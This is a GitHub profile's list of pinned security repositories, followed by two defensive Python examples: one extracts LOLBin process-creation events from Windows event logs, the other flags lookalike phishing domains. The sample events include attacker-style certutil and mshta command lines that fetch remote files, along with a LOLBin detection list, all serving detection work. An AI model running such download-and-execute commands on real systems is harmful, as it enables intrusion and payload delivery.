sankyhack's Pinned Repositories
tracee
Linux Runtime Security and Forensics using eBPF
CobaltStrike-TLS-Metadata-Analysis
ExtractLOLBin
Script written to fetch LOLBin details from Security and Sysmon EVTX files.
Linux-Forensics-Tools-Capabilities
This repository contains a simple CSV file which lists the artifacts gathered by Linux forensic tools.
Playing-with-Process-Data-of-10k-Malware-Sample
The purpose of this analysis is to understand common malware behaviour: the locations malware runs from, commonly used LOLBins, processes that communicate with the internet, and some hunting based on those observations.
PowerShell-Reversing
Similar-looking-domain-detection-using-python-fuzzywuzzy
A major cause of phishing and BEC incidents is similar-looking domains; if you detect them early, you can prevent incidents early, and the Python fuzzywuzzy module lets you do that.
SysmonConfig-Blank
Threat-Hunting-with-WebProxy-Logs-using-Pandas---Jupyter-Notebook
Vectra-AI
Scripts written to fetch rules and certain detections from Vectra AI.
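The ExtractLOLBin entry above describes pulling LOLBin process-creation events out of Security and Sysmon EVTX files. The following is an added example of that technique, not code from the ExtractLOLBin repository: it assumes the EVTX records have already been exported to standard Windows event XML (for example with python-evtx's record `.xml()` or `wevtutil qe Security /f:xml`), matches Sysmon Event ID 1 and Security 4688 records against a small LOLBin list, and normalises the two providers' differing field names. The LOLBin set and the sample events are constructed for the example.

```python
"""Extract LOLBin process-creation events from exported Windows event XML.

Added example, not the ExtractLOLBin project's own code. Assumes records are
already in Windows event XML (python-evtx record.xml(), wevtutil /f:xml).
"""
import xml.etree.ElementTree as ET
from pathlib import PureWindowsPath

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Constructed subset of binaries catalogued by the LOLBAS project; extend to taste.
LOLBINS = {
    "certutil.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe", "bitsadmin.exe",
    "wmic.exe", "msiexec.exe", "cscript.exe", "wscript.exe", "msbuild.exe",
}

# (provider, event id) -> EventData names for image, command line, parent, user.
# Sysmon and the Security log name the same facts differently.
PROCESS_FIELDS = {
    ("Microsoft-Windows-Sysmon", 1):
        ("Image", "CommandLine", "ParentImage", "User"),
    ("Microsoft-Windows-Security-Auditing", 4688):
        ("NewProcessName", "CommandLine", "ParentProcessName", "SubjectUserName"),
}


def parse_event(xml_text):
    """Return a dict describing a LOLBin process-creation event, else None."""
    root = ET.fromstring(xml_text)
    provider = root.find("e:System/e:Provider", NS).get("Name")
    event_id = int(root.find("e:System/e:EventID", NS).text)
    fields = PROCESS_FIELDS.get((provider, event_id))
    if fields is None:
        return None  # not a process-creation event we know how to read
    data = {d.get("Name"): (d.text or "")
            for d in root.findall("e:EventData/e:Data", NS)}
    image_key, cmd_key, parent_key, user_key = fields
    image = data.get(image_key, "")
    binary = PureWindowsPath(image).name.lower()  # basename, case-folded
    if binary not in LOLBINS:
        return None
    computer = root.find("e:System/e:Computer", NS)
    return {
        "computer": computer.text if computer is not None else "",
        "provider": provider,
        "event_id": event_id,
        "binary": binary,
        "image": image,
        # Empty on 4688 when command-line auditing is not enabled.
        "command_line": data.get(cmd_key, ""),
        "parent": data.get(parent_key, ""),
        "user": data.get(user_key, ""),
    }


def extract_lolbins(xml_records):
    """Run parse_event over event XML strings and keep only the LOLBin hits."""
    return [hit for hit in map(parse_event, xml_records) if hit is not None]


# Constructed sample records in the shape an EVTX export produces.
SAMPLE_EVENTS = [
    # Sysmon Event ID 1: certutil used as a downloader.
    r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>1</EventID>
    <Computer>WS01.corp.local</Computer></System>
  <EventData>
    <Data Name="Image">C:\Windows\System32\certutil.exe</Data>
    <Data Name="CommandLine">certutil.exe -urlcache -split -f http://203.0.113.7/a.txt C:\Users\Public\a.txt</Data>
    <Data Name="User">CORP\jsmith</Data>
    <Data Name="ParentImage">C:\Windows\System32\cmd.exe</Data>
  </EventData></Event>""",
    # Security 4688: mshta launched from explorer.
    r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Security-Auditing"/><EventID>4688</EventID>
    <Computer>WS01.corp.local</Computer></System>
  <EventData>
    <Data Name="SubjectUserName">jsmith</Data>
    <Data Name="NewProcessName">C:\Windows\System32\mshta.exe</Data>
    <Data Name="CommandLine">mshta.exe http://203.0.113.7/p.hta</Data>
    <Data Name="ParentProcessName">C:\Windows\explorer.exe</Data>
  </EventData></Event>""",
    # Sysmon Event ID 1 for a non-LOLBin: should be ignored.
    r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>1</EventID></System>
  <EventData><Data Name="Image">C:\Windows\System32\notepad.exe</Data>
    <Data Name="CommandLine">notepad.exe</Data></EventData></Event>""",
    # Sysmon Event ID 3 (network connection): not a process-creation event.
    r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>3</EventID></System>
  <EventData><Data Name="Image">C:\Windows\System32\certutil.exe</Data>
    <Data Name="DestinationIp">203.0.113.7</Data></EventData></Event>""",
]

if __name__ == "__main__":
    for hit in extract_lolbins(SAMPLE_EVENTS):
        print(f"{hit['event_id']:>5} {hit['user']:<12} {hit['binary']:<14} {hit['command_line']}")
```

Against a real EVTX file, feed `parse_event` each record's XML from python-evtx and collect the hits into a CSV or pandas frame; the parent image and command line are what make a LOLBin hit triageable, since certutil launched by an installer and certutil launched from cmd.exe with `-urlcache` are very different events.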
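The Similar-looking-domain-detection entry above describes catching lookalike domains with fuzzywuzzy. The following is an added example of that detection, not code from that repository. It uses `difflib.SequenceMatcher` from the standard library, which is exactly what fuzzywuzzy's `fuzz.ratio` and `fuzz.partial_ratio` compute when python-Levenshtein is not installed, so it runs with no third-party module; the protected brand domains, the threshold and the observed domains are constructed for the example, and the `core_label` helper deliberately ignores multi-label public suffixes.

```python
"""Flag domains that look like ones we own, the way the fuzzywuzzy-based
detection works. Added example, not the repository's own code; brand domains,
threshold and observed domains below are constructed for illustration."""
from difflib import SequenceMatcher

PROTECTED = ["examplebank.com", "contoso.com"]  # hypothetical brands to protect
THRESHOLD = 85  # 0-100 score; tune against your own false-positive rate


def fuzz_ratio(a, b):
    """Same computation as fuzzywuzzy fuzz.ratio without python-Levenshtein."""
    return int(round(100 * SequenceMatcher(None, a, b).ratio()))


def partial_ratio(a, b):
    """Same computation as fuzzywuzzy fuzz.partial_ratio: best alignment of the
    shorter string inside the longer one, so 'examplebank-secure' still scores 100."""
    shorter, longer = (a, b) if len(a) <= len(b) else (b, a)
    blocks = SequenceMatcher(None, shorter, longer).get_matching_blocks()
    best = 0.0
    for i, j, _ in blocks:
        start = max(j - i, 0)
        window = longer[start:start + len(shorter)]
        r = SequenceMatcher(None, shorter, window).ratio()
        if r > 0.995:
            return 100
        best = max(best, r)
    return int(round(100 * best))


def core_label(domain):
    """Label left of the TLD. Naive on purpose: 'bank.co.uk' gives 'co';
    use a public-suffix list in production."""
    labels = domain.lower().rstrip(".").split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


def find_lookalikes(observed, protected=PROTECTED, threshold=THRESHOLD):
    """One hit per (observed, protected) pair scoring at or above threshold.
    Our own domains and their subdomains are skipped, not scored."""
    brands = {p.lower(): core_label(p) for p in protected}
    hits = []
    for raw in observed:
        d = raw.lower().rstrip(".")
        if any(d == b or d.endswith("." + b) for b in brands):
            continue  # legitimately ours, e.g. www.examplebank.com
        label = core_label(d)
        for brand, brand_label in brands.items():
            r = fuzz_ratio(label, brand_label)
            p = partial_ratio(label, brand_label)
            if max(r, p) >= threshold:
                hits.append({"domain": raw, "protected": brand,
                             "ratio": r, "partial_ratio": p})
    return hits


# Constructed sample: domains as they might appear in proxy logs or sender addresses.
OBSERVED = [
    "examplebank.com",         # ours
    "www.examplebank.com",     # ours (subdomain)
    "exampIebank.com",         # capital I for l
    "examplebnk.net",          # dropped letter, different TLD
    "examplebank-secure.com",  # brand plus a suffix: ratio misses it, partial_ratio catches it
    "contoso-login.com",
    "cont0so.com",             # digit zero for o
    "github.com",              # unrelated
]

if __name__ == "__main__":
    for hit in find_lookalikes(OBSERVED):
        print(f"{hit['domain']:<24} ~ {hit['protected']:<16} "
              f"ratio={hit['ratio']:>3} partial={hit['partial_ratio']:>3}")
```

`fuzz_ratio` alone misses brand-plus-suffix registrations such as `examplebank-secure.com` (it scores 76 here), which is why the example also keeps `partial_ratio`; the cost is that short brand labels will match inside many unrelated names, so set the threshold per brand rather than globally when you run this over real proxy or MX logs.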